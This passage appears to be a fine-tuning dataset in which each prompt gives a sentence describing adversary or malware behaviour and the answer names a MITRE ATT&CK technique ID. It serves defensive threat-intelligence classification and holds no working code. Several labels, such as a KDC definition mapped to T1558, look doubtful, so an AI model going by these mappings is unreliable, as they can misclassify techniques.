Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malicious DLL is not a service DLL because it lacks ServiceMain()### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can search for specific files and list directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal leveraged a watering hole to serve up malicious code.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has executed commands through the installed web shell via Tor exit nodes.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can perform keylogging on the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has a packed payload when delivered.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several types exist: ### Browser-based Exploitation Web browsers are a common target through Drive-by Compromise and Spearphishing Link.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to XOR encrypt files to be sent to C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has also used Nt* API functions to perform Process Injection.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilGrab has the capability to capture audio from a victim machine.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BITS enabled execution may also enable persistence by creating long-standing jobs or invoking an arbitrary program when a job completes or errors .### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SslMM identifies and kills anti-malware processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can stop specific services related to backups.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various forms of Masquerading on the file to increase the likelihood that a user will open it.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has developed malware for use in operations, including the creation of infected removable media.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT performs code injection injecting its own functions to browser processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use process hollowing to execute its main payload.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File starts as mico-audio.exe and installs to C:\Users\%USERNAME%\AppData\Roaming\google-chrome\crome.exe### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Patch System Image to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can list contents of drives and search for files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard was executed through an unsecure kubelet that allowed anonymous access to the victim environment.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers .### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has cleared log files within the /var/log/ folder.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo can collect screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon has used call to LoadLibrary to load its installer.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke collects information on network settings and Internet proxy settings from the victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The KDC is responsible for both authentication and ticket granting.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo enumerates the current network connections similar to net use .### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has collected usernames and passwords from Firefox and Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 created a directory named ""out"" in the user's %AppData% folder and copied files to it.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can identify the user id on a target machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware families are capable of downloading and executing binaries from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib has the ability to enumerate system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL is capable of setting and deleting Registry values.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has a feature to copy files from every drive onto a removable drive in a hidden folder.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can identify the country code on a compromised host.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used key loggers to steal usernames and passwords.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto adds permissions and remote logins to all users.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has used BITS jobs to download malicious payloads.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This functionality could also be built into remote access tools.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA looking for specific IP ranges Our analysis of samples of the hack tool (HKTL_NBTSCAN.GA and HKTL_NBTSCAN.GB) indicate it as a command-line program that scans IP networks for NetBIOS information such as IP address, NetBIOS computer name, logged-in username, and MAC address—with some of the information coming from the initial RATAKNBA installation### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower sets up persistence with a Registry run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can open a remote command-line interface and execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi searches for files on the system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Reading raw keystroke data from the hardware buffer.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It does this by creating the following Registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll and HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse mavinject.exe to proxy execution of malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code for new functionality can be included in these messages.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts .### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regsvr32.exe is also a Microsoft signed binary.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Code Signing, this activity will not result in a valid signature.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Delivery document The delivery document contains a macro that downloads an executable from a remote server### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Windows, Applications can access clipboard data by using the Windows API.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CMSTP.exe accepts an installation information file as a parameter and installs a service profile leveraged for remote access connections.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can establish using a AppCertDLLs Registry key.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has encrypted the payload with an XOR-based algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork removed certain files and replaced them so they could not be retrieved.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet used xp_cmdshell to store and execute SQL code.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This type of prompt can be used to collect credentials via various languages such as AppleScript and PowerShell.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has the capability to take screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FakeM C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo!### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They also targeted Yahoo users with applications masquerading as ""Delivery Service"" and ""McAfee Email Protection"".### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KARAE can use public cloud-based storage providers for command and control.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has downloaded additional files onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unpacks the code in memory via process hollowing### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions, and then brute forcing usernames and passwords### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson has the ability to execute commands with the COMSPEC environment variable.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia creates a command-line shell using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can retrieve screenshots from compromised hosts.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can create social media accounts that can be used to build a persona to further operations.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee launches a DLL file that gets executed as a service using svchost.exe Ke3chang has used a tool known as RemoteExec to remotely execute batch scripts and binaries.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth logs keystrokes from the victim's machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can remove strings from binaries.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot gathers domain and account names/information through process monitoring.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, net config, ipconfig /all, and route commands, as well as NBTscan.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares..### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,infoClient is reponsible for collecting OS info, submitting this info to its C&C servers (the servers are malicious in nature), and receiving additional C&C communication information### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ELMER is capable of performing directory listings.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD searches for interesting files on removable media and copies them to a staging area.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JPIN variant downloads the backdoor payload via the BITS service.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used pass the hash for authentication to remote access software used in C2.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy's installer has delayed installation of GoldenSpy for two hours after it reaches a victim system.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used JavaScript for code execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.. Keydnap adds the setuid flag to a binary so it can easily elevate in the future.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used valid accounts for initial access and privilege escalation.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,hides any strings related to its own indicators of compromise.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gather domain and account names based on all running processes Gathering account information from running processes### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has created a scheduled task named ""MicrosoftEdge"" to establish persistence.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it.  Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI uses Base64 encoding for strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The webshell will save the archives locally to the server in the C:\Users\Public\Libraries\Recorded\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can collect the host IP address from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum can deploy additional components or tools as needed.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific common information repositories include web-based platforms such as Sharepoint and Confluence, specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are several examples of malware targeting cookies from web browsers on the local system.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has collected various files from the compromised computers.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore uses VBS files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With CLR integration enabled, application developers can write stored procedures using any .NET framework language .### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can identify the process that owns remote connections.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has been observed deleting the temporary files once they fulfill their task.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\Username\AppData\Local\Microsoft\\Vault/Credentials\.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp downloads a tar compressed archive from a download server to the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can search for specific files and directories on a machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince gathers information about the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya has obtained and used tools such as Impacket, Winexe, and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses VBScripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDFSNIFFER has the capability of deleting local files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee used batch scripting.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used environment variable string substitution for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may forge credential materials that can be used to gain access to web applications or Internet services.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya uses wevtutil to clear the Windows event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In macOS, every user account has a userID associated with it.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the ""wercplsupport"" service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 attempted to remove evidence of some of its activity by deleting Bash histories.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KARAE can upload and download files, including second-stage malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete’s collected files are exfiltrated automatically to remote servers.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu can download additional files from URLs.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Snapshot of code we used to decrypt TClient’s configuration Figure 11### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network of the enterprise.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 added Registry Run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp encodes its second-stage payload with Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can overwrite Registry settings to reduce its visibility on the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda's custom ORat tool uses a WMI event consumer to maintain 